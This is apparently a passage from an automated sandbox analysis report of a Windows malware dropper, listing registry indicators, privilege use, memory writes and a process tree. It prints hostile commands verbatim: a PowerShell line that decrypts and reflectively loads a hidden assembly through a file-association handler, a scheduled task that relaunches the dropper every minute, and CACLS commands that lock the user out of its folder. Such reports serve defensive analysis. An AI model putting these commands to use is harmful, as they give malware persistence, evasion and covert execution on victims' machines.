Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | conhost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Modifies registry class 39 IoCs
Processes: Explorer.EXE, powershell.exe, rundll32.exe, svchost.exe, svchost.exe
description | ioc | process
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell\open | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | Explorer.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]43,40,34,231,152,221,253,185,62,148,240,241,99,206,96,33,14,60,169,236,234,238,30,154,71,251,34,196,130,93,105,193);$A.IV=@([byte]12,149,177,4,191,6,243,253,155,163,193,103,144,104,239,238);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\rf1pzoxxi3t.iqejof24z4a'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[xF9MBhD11Uboko4.PbxDwsvP6fEK0qiF26sgtXEsvZYYfDOk56NDcpRwBQsm5JPMxpMT0PxTTSJxPvtdOqtePwvITy4GLpW8H]::SaDHVXEPeR09i1FG9E5Li7xIYPSH();\"" | powershell.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{3AACBEAB-8B99-49AD-8FEE-08AC28563690} | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | rundll32.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2629973501-4017243118-3254762364-1000\{3D40337F-ADDE-477E-963B-6DC3F6486AA2} | svchost.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\amg0gg0kcwh\shell\open\command | powershell.exe
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | rundll32.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | Explorer.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | Explorer.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.iqejof24z4a | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\.iqejof24z4a\ = "amg0gg0kcwh" | powershell.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000003f56cf82100054656d7000003a0009000400efbe0c5519993f56d2822e00000000000000000000000000000000000000000000000000cac2c200540065006d007000000014000000 | Explorer.EXE
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | Explorer.EXE
Runs ping.exe 1 TTPs 1 IoCs
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 79 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: Explorer.EXE
pid | process
376 | Explorer.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: moda.exe, trena1.exe, moda1.exe, druid1.exe, druid.exe, OwvtknErB0Wl.exe, nitka.exe, fular.exe, WerFault.exe, nitka1.exe
pid | process
4320 | moda.exe
4320 | moda.exe
3348 | trena1.exe
3348 | trena1.exe
260 | moda1.exe
260 | moda1.exe
4124 | druid1.exe
3232 | druid.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
4124 |
3232 | druid.exe
3200 | nitka.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2332 | OwvtknErB0Wl.exe
2908 | fular.exe
3200 | nitka.exe
4740 | WerFault.exe
2908 | fular.exe
4976 | nitka1.exe
4740 | WerFault.exe
4976 | nitka1.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
pid | process
376 | Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
656 |
Suspicious behavior: MapViewOfSection 1 IoCs
Processes: ChromeSetup.exe
pid | process
2656 | ChromeSetup.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: moda.exe, trena1.exe, moda1.exe, nitka.exe, druid1.exe, druid.exe, nitka1.exe, fular.exe, WerFault.exe, fular1.exe, vina1.exe, powershell.exe, powershell.exe, powershell.exe, Explorer.EXE, powershell.exe, powercfg.exe, powershell.exe, sc.exe, powercfg.exe, reg.exe
description | pid | process
Token: SeDebugPrivilege | 4320 | moda.exe
Token: SeDebugPrivilege | 3348 | trena1.exe
Token: SeDebugPrivilege | 260 | moda1.exe
Token: SeDebugPrivilege | 3200 | nitka.exe
Token: SeDebugPrivilege | 4124 | druid1.exe
Token: SeDebugPrivilege | 3232 | druid.exe
Token: SeDebugPrivilege | 4976 | nitka1.exe
Token: SeDebugPrivilege | 2908 | fular.exe
Token: SeDebugPrivilege | 4740 | WerFault.exe
Token: SeDebugPrivilege | 432 | fular1.exe
Token: SeShutdownPrivilege | 3952 | vina1.exe
Token: SeCreatePagefilePrivilege | 3952 | vina1.exe
Token: SeDebugPrivilege | 2708 | powershell.exe
Token: SeDebugPrivilege | 5108 | powershell.exe
Token: SeDebugPrivilege | 4188 | powershell.exe
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeDebugPrivilege | 3152 | powershell.exe
Token: SeShutdownPrivilege | 1548 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1548 | powercfg.exe
Token: SeDebugPrivilege | 2104 | powershell.exe
Token: SeShutdownPrivilege | 1124 | sc.exe
Token: SeCreatePagefilePrivilege | 1124 | sc.exe
Token: SeShutdownPrivilege | 376 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 376 | Explorer.EXE
Token: SeShutdownPrivilege | 260 | powercfg.exe
Token: SeCreatePagefilePrivilege | 260 | powercfg.exe
Token: SeShutdownPrivilege | 3948 | reg.exe
Token: SeCreatePagefilePrivilege | 3948 | reg.exe
Token: SeIncreaseQuotaPrivilege | 2104 | powershell.exe
Token: SeSecurityPrivilege | 2104 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2104 | powershell.exe
Token: SeLoadDriverPrivilege | 2104 | powershell.exe
Token: SeSystemProfilePrivilege | 2104 | powershell.exe
Token: SeSystemtimePrivilege | 2104 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2104 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2104 | powershell.exe
Token: SeCreatePagefilePrivilege | 2104 | powershell.exe
Token: SeBackupPrivilege | 2104 | powershell.exe
Token: SeRestorePrivilege | 2104 | powershell.exe
Token: SeShutdownPrivilege | 2104 | powershell.exe
Token: SeDebugPrivilege | 2104 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2104 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2104 | powershell.exe
Suspicious use of FindShellTrayWindow 8 IoCs
Processes: Russian.exe.pif, Explorer.EXE, rundll32.exe
pid | process
1444 | Russian.exe.pif
376 | Explorer.EXE
376 | Explorer.EXE
1444 | Russian.exe.pif
1444 | Russian.exe.pif
376 | Explorer.EXE
376 | Explorer.EXE
3948 | rundll32.exe
Suspicious use of SendNotifyMessage 3 IoCs
Processes: Russian.exe.pif
pid | process
1444 | Russian.exe.pif
1444 | Russian.exe.pif
1444 | Russian.exe.pif
Suspicious use of SetWindowsHookEx 3 IoCs
Processes: OpenWith.exe, Explorer.EXE
pid | process
1516 | OpenWith.exe
376 | Explorer.EXE
376 | Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes: f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe, nbveek.exe, cmd.exe, lebro.exe, nbveek.exe, cmd.exe
description | pid | process | target process
PID 1976 wrote to memory of 628 | 1976 | f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe | nbveek.exe
PID 1976 wrote to memory of 628 | 1976 | f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe | nbveek.exe
PID 1976 wrote to memory of 628 | 1976 | f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe | nbveek.exe
PID 628 wrote to memory of 4964 | 628 | nbveek.exe | schtasks.exe
PID 628 wrote to memory of 4964 | 628 | nbveek.exe | schtasks.exe
PID 628 wrote to memory of 4964 | 628 | nbveek.exe | schtasks.exe
PID 628 wrote to memory of 872 | 628 | nbveek.exe | cmd.exe
PID 628 wrote to memory of 872 | 628 | nbveek.exe | cmd.exe
PID 628 wrote to memory of 872 | 628 | nbveek.exe | cmd.exe
PID 872 wrote to memory of 4636 | 872 | cmd.exe | cmd.exe
PID 872 wrote to memory of 4636 | 872 | cmd.exe | cmd.exe
PID 872 wrote to memory of 4636 | 872 | cmd.exe | cmd.exe
PID 872 wrote to memory of 4600 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 4600 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 4600 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 4660 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 4660 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 4660 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 1772 | 872 | cmd.exe | cmd.exe
PID 872 wrote to memory of 1772 | 872 | cmd.exe | cmd.exe
PID 872 wrote to memory of 1772 | 872 | cmd.exe | cmd.exe
PID 872 wrote to memory of 3504 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 3504 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 3504 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 2128 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 2128 | 872 | cmd.exe | cacls.exe
PID 872 wrote to memory of 2128 | 872 | cmd.exe | cacls.exe
PID 628 wrote to memory of 4320 | 628 | nbveek.exe | moda.exe
PID 628 wrote to memory of 4320 | 628 | nbveek.exe | moda.exe
PID 628 wrote to memory of 3348 | 628 | nbveek.exe | trena1.exe
PID 628 wrote to memory of 3348 | 628 | nbveek.exe | trena1.exe
PID 628 wrote to memory of 4124 | 628 | nbveek.exe | druid1.exe
PID 628 wrote to memory of 4124 | 628 | nbveek.exe | druid1.exe
PID 628 wrote to memory of 4124 | 628 | nbveek.exe | druid1.exe
PID 628 wrote to memory of 3200 | 628 | nbveek.exe | nitka.exe
PID 628 wrote to memory of 3200 | 628 | nbveek.exe | nitka.exe
PID 628 wrote to memory of 3200 | 628 | nbveek.exe | nitka.exe
PID 628 wrote to memory of 260 | 628 | nbveek.exe | moda1.exe
PID 628 wrote to memory of 260 | 628 | nbveek.exe | moda1.exe
PID 628 wrote to memory of 3232 | 628 | nbveek.exe | druid.exe
PID 628 wrote to memory of 3232 | 628 | nbveek.exe | druid.exe
PID 628 wrote to memory of 3232 | 628 | nbveek.exe | druid.exe
PID 628 wrote to memory of 4976 | 628 | nbveek.exe | nitka1.exe
PID 628 wrote to memory of 4976 | 628 | nbveek.exe | nitka1.exe
PID 628 wrote to memory of 4976 | 628 | nbveek.exe | nitka1.exe
PID 628 wrote to memory of 3168 | 628 | nbveek.exe | lebro.exe
PID 628 wrote to memory of 3168 | 628 | nbveek.exe | lebro.exe
PID 628 wrote to memory of 3168 | 628 | nbveek.exe | lebro.exe
PID 3168 wrote to memory of 3376 | 3168 | lebro.exe | nbveek.exe
PID 3168 wrote to memory of 3376 | 3168 | lebro.exe | nbveek.exe
PID 3168 wrote to memory of 3376 | 3168 | lebro.exe | nbveek.exe
PID 3376 wrote to memory of 3264 | 3376 | nbveek.exe | schtasks.exe
PID 3376 wrote to memory of 3264 | 3376 | nbveek.exe | schtasks.exe
PID 3376 wrote to memory of 3264 | 3376 | nbveek.exe | schtasks.exe
PID 3376 wrote to memory of 5052 | 3376 | nbveek.exe | cmd.exe
PID 3376 wrote to memory of 5052 | 3376 | nbveek.exe | cmd.exe
PID 3376 wrote to memory of 5052 | 3376 | nbveek.exe | cmd.exe
PID 5052 wrote to memory of 4148 | 5052 | cmd.exe | cmd.exe
PID 5052 wrote to memory of 4148 | 5052 | cmd.exe | cmd.exe
PID 5052 wrote to memory of 4148 | 5052 | cmd.exe | cmd.exe
PID 5052 wrote to memory of 4888 | 5052 | cmd.exe | cacls.exe
PID 5052 wrote to memory of 4888 | 5052 | cmd.exe | cacls.exe
PID 5052 wrote to memory of 4888 | 5052 | cmd.exe | cacls.exe
PID 628 wrote to memory of 2908 | 628 | nbveek.exe | fular.exe
outlook_office_path 1 IoCs
Processes: rundll32.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | rundll32.exe
outlook_win_path 1 IoCs
Processes: rundll32.exe
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | rundll32.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"C:\Users\Admin\AppData\Local\Temp\f3cd81daa660f8a66d5fd299a0801d06eb05e88dfc914.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\nbveek.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:N"5⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\5eb6b96734" /P "Admin:R" /E5⤵
-
C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"C:\Users\Admin\AppData\Local\Temp\1000001001\moda.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"C:\Users\Admin\AppData\Local\Temp\1000002001\trena1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"C:\Users\Admin\AppData\Local\Temp\1000003051\druid1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"C:\Users\Admin\AppData\Local\Temp\1000004051\nitka.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 12325⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\moda1.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"C:\Users\Admin\AppData\Local\Temp\1000006051\druid.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\nitka1.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 20685⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\lebro.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
